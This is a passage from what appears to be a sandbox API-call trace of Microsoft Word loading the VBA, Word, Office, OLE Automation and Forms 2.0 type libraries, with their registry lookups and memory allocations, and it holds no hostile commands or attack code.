[6]=0x1, [7]=0xd2)), ppvObject=0x187008 | out: ppvObject=0x187008*=0x0) returned 0x80004002 [0041.365] IMalloc:Alloc (This=0x7feffc15380, cb=0x70) returned 0x6c10780 [0041.365] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0041.365] IUnknown:AddRef (This=0x6990960) returned 0x7 [0041.365] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x186538, pDummy=0x0 | out: ppTLibAttr=0x186538, pDummy=0x0) returned 0x0 [0041.365] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x186550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.365] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e64550 [0041.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x1865c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpUsedDefaultChar=0x0) returned 66 [0041.366] strcpy_s (in: _Dst=0x6a7c240, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0041.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x1866d0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0041.366] strcpy_s (in: _Dst=0x6a7c290, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0041.366] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e649a0 [0041.366] IUnknown:AddRef (This=0x6990960) returned 0x8 [0041.366] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0041.366] IUnknown:Release (This=0x6990960) returned 0x7 [0041.366] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0041.366] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0041.366] IUnknown:AddRef (This=0x6992850) returned 0x10 [0041.366] ITypeLib:RemoteGetLibAttr (in: This=0x6992850, ppTLibAttr=0x186538, pDummy=0x0 | out: ppTLibAttr=0x186538, pDummy=0x0) returned 0x0 [0041.366] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x186550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x1865c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0041.366] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca6b20 [0041.366] strcpy_s (in: _Dst=0x6ca6b48, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0041.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x1866d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0041.367] strcpy_s (in: _Dst=0x6ca6b90, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0041.367] IUnknown:AddRef (This=0x6992850) returned 0x11 [0041.367] ITypeLib:LocalReleaseTLibAttr (This=0x6992850) returned 0x0 [0041.367] IUnknown:Release (This=0x6992850) returned 0x10 [0041.367] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0041.367] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0041.367] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0041.367] IUnknown:AddRef (This=0x6992df0) returned 0x8 [0041.367] ITypeLib:RemoteGetLibAttr (in: This=0x6992df0, ppTLibAttr=0x186538, pDummy=0x0 | out: ppTLibAttr=0x186538, pDummy=0x0) returned 0x0 [0041.367] ITypeLib:RemoteGetDocumentation (in: This=0x6992df0, index=-1, refPtrFlags=0x186550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x1865c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0041.367] strcpy_s (in: _Dst=0x6ca6c00, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0041.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x1866d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0041.367] strcpy_s (in: _Dst=0x6ca6c28, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0041.368] IUnknown:AddRef (This=0x6992df0) returned 0x9 [0041.368] ITypeLib:LocalReleaseTLibAttr (This=0x6992df0) returned 0x0 [0041.368] IUnknown:Release (This=0x6992df0) returned 0x8 [0041.368] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x20) returned 0x68e9040 [0041.368] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0041.368] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0041.369] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0041.369] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\CNormal") returned 4 [0041.369] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0041.369] IUnknown:AddRef (This=0x6992580) returned 0x6 [0041.369] ITypeLib:RemoteGetLibAttr (in: This=0x6992580, ppTLibAttr=0x186538, pDummy=0x0 | out: ppTLibAttr=0x186538, pDummy=0x0) returned 0x0 [0041.369] ITypeLib:RemoteGetDocumentation (in: This=0x6992580, index=-1, refPtrFlags=0x186550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x1865c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpUsedDefaultChar=0x0) returned 63 [0041.369] strcpy_s (in: _Dst=0x6ca6c98, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0041.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x1866d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0041.369] strcpy_s (in: _Dst=0x6ca6ce0, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0041.369] IUnknown:AddRef (This=0x6992580) returned 0x7 [0041.369] ITypeLib:LocalReleaseTLibAttr (This=0x6992580) returned 0x0 [0041.369] IUnknown:Release (This=0x6992580) returned 0x6 [0041.370] _wcsicmp (_String1="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 52 [0041.370] _wcsicmp (_String1="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 52 [0041.370] _wcsicmp (_String1="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 52 [0041.370] _wcsicmp (_String1="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _String2="*\\CNormal") returned 4 [0041.370] _wcsicmp (_String1="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -2 [0041.371] _wcsicmp (_String1="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _String2="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0 [0041.371] IUnknown:AddRef (This=0x6993ed0) returned 0x3 [0041.371] ITypeLib:RemoteGetLibAttr (in: This=0x6993ed0, ppTLibAttr=0x186538, pDummy=0x0 | out: ppTLibAttr=0x186538, pDummy=0x0) returned 0x0 [0041.371] ITypeLib:RemoteGetDocumentation (in: This=0x6993ed0, index=-1, refPtrFlags=0x186550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", cchWideChar=28, lpMultiByteStr=0x1865c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\FM20.DLLs\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpUsedDefaultChar=0x0) returned 28 [0041.371] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca6d70 [0041.371] strcpy_s (in: _Dst=0x6ca6d98, _DstSize=0x1d, _Src="C:\\Windows\\system32\\FM20.DLL" | out: _Dst="C:\\Windows\\system32\\FM20.DLL") returned 0x0 [0041.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSForms", cchWideChar=8, lpMultiByteStr=0x1866d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSForms", lpUsedDefaultChar=0x0) returned 8 [0041.371] strcpy_s (in: _Dst=0x6ca6d38, _DstSize=0x8, _Src="MSForms" | out: _Dst="MSForms") returned 0x0 [0041.371] IUnknown:AddRef (This=0x6993ed0) returned 0x4 [0041.371] ITypeLib:LocalReleaseTLibAttr (This=0x6993ed0) returned 0x0 [0041.371] CLSIDFromString (in: lpsz="{F56CEE21-65E9-483A-A24D-7EF213EC6933}", pclsid=0x1867c0 | out: pclsid=0x1867c0*(Data1=0xf56cee21, Data2=0x65e9, Data3=0x483a, Data4=([0]=0xa2, [1]=0x4d, [2]=0x7e, [3]=0xf2, [4]=0x13, [5]=0xec, [6]=0x69, [7]=0x33))) returned 0x0 [0041.371] swprintf_s (in: _Dst=0x1863a8, _SizeInWords=0xc, _Format="%x." | out: _Dst="2.") returned 2 [0041.372] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="Typelib", ulOptions=0x0, samDesired=0x20019, phkResult=0x186388 | out: phkResult=0x186388*=0xa06) returned 0x0 [0041.372] StringFromGUID2 (in: rguid=0x1866f0*(Data1=0xd452ee1, Data2=0xe08f, Data3=0x101a, Data4=([0]=0x85, [1]=0x2e, [2]=0x2, [3]=0x60, [4]=0x8c, [5]=0x4d, [6]=0xb, [7]=0xb4)), lpsz=0x1863c0, cchMax=39 | out: lpsz="{0D452EE1-E08F-101A-852E-02608C4D0BB4}") returned 39 [0041.372] RegOpenKeyExW (in: hKey=0xa06, lpSubKey="{0D452EE1-E08F-101A-852E-02608C4D0BB4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x186390 | out: phkResult=0x186390*=0xa1e) returned 0x0 [0041.372] RegEnumKeyExW (in: hKey=0xa1e, dwIndex=0x0, lpName=0x186410, lpcchName=0x186374, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="2.0", lpcchName=0x186374, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0041.372] wcsncmp (_String1="2.", _String2="2.", _MaxCount=0x2) returned 0 [0041.380] RegEnumKeyExW (in: hKey=0xa1e, dwIndex=0x1, lpName=0x186410, lpcchName=0x186374, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="2.0", lpcchName=0x186374, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0041.380] RegCloseKey (hKey=0xa1e) returned 0x0 [0041.380] RegCloseKey (hKey=0xa06) returned 0x0 [0041.380] LoadRegTypeLib (in: rguid=0x1867c0*(Data1=0xf56cee21, Data2=0x65e9, Data3=0x483a, Data4=([0]=0xa2, [1]=0x4d, [2]=0x7e, [3]=0xf2, [4]=0x13, [5]=0xec, [6]=0x69, [7]=0x33)), wVerMajor=0x2, wVerMinor=0x0, lcid=0x0, pptlib=0x186688*=0x0 | out: pptlib=0x186688*=0x0) returned 0x8002801d [0041.381] QueryPathOfRegTypeLib (in: guid=0x6c691b0*(Data1=0xd452ee1, Data2=0xe08f, Data3=0x101a, Data4=([0]=0x85, [1]=0x2e, [2]=0x2, [3]=0x60, [4]=0x8c, [5]=0x4d, [6]=0xb, [7]=0xb4)), wMaj=0xffff, wMin=0xffff, lcid=0x0, lpbstrPathName=0x1866b8 | out: lpbstrPathName=0x1866b8) returned 0x0 [0041.384] LoadTypeLib (in: szFile="C:\\Windows\\system32\\FM20.DLL", pptlib=0x186690*=0x0 | out: pptlib=0x186690*=0x6993ed0) returned 0x0 [0041.384] ITypeLib:RemoteGetLibAttr (in: This=0x6993ed0, ppTLibAttr=0x1866d0, pDummy=0x0 | out: ppTLibAttr=0x1866d0, pDummy=0x0) returned 0x0 [0041.384] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ca91d8, ppTypeAttr=0x1864f0, pDummy=0x0 | out: ppTypeAttr=0x1864f0, pDummy=0x0) returned 0x0 [0041.384] ITypeInfo:LocalReleaseTypeAttr (This=0x6ca91d8) returned 0x0 [0041.384] ITypeLib:LocalReleaseTLibAttr (This=0x6993ed0) returned 0x0 [0041.384] IUnknown:Release (This=0x6993ed0) returned 0x4 [0041.384] IUnknown:Release (This=0x6993ed0) returned 0x3 [0041.384] IMalloc:Free (This=0x7feffc15380, pv=0x6c328f0) [0041.384] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x186198, pDummy=0x69d77b0 | out: ppTypeAttr=0x186198, pDummy=0x69d77b0*=0x7) returned 0x0 [0041.384] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.384] IUnknown:Release (This=0x6a86110) returned 0x2 [0041.385] IMalloc:Alloc (This=0x7feffc15380, cb=0x118) returned 0x3be7fe0 [0041.385] IMalloc:Alloc (This=0x7feffc15380, cb=0xe30) returned 0x6bc1af0 [0041.385] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x186178, pDummy=0x1861b4 | out: ppTypeAttr=0x186178, pDummy=0x1861b4*=0xffffffff) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x0, ppFuncDesc=0x186170, pDummy=0x1861b8 | out: ppFuncDesc=0x186170, pDummy=0x1861b8*=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x1, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x2, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x3, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x4, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x5, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x6, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x7, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x8, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x9, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xa, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.385] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.385] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xb, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xc, ppFuncDesc=0x186170, pDummy=0xf0 | out: ppFuncDesc=0x186170, pDummy=0xf0) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x186178, pDummy=0x1861b4 | out: ppTypeAttr=0x186178, pDummy=0x1861b4*=0xffffffff) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x0, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x1, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x2, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x3, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x4, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x5, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x6, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x7, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x8, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x9, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xa, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xb, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xc, ppFuncDesc=0x186170, pDummy=0x70 | out: ppFuncDesc=0x186170, pDummy=0x70) returned 0x0 [0041.386] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.386] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.386] IUnknown:Release (This=0x6a861c0) returned 0x5 [0041.386] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c328f0 [0041.386] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c327f0 [0041.386] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c32ab0 [0041.386] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c32850 [0041.387] IUnknown:QueryInterface (in: 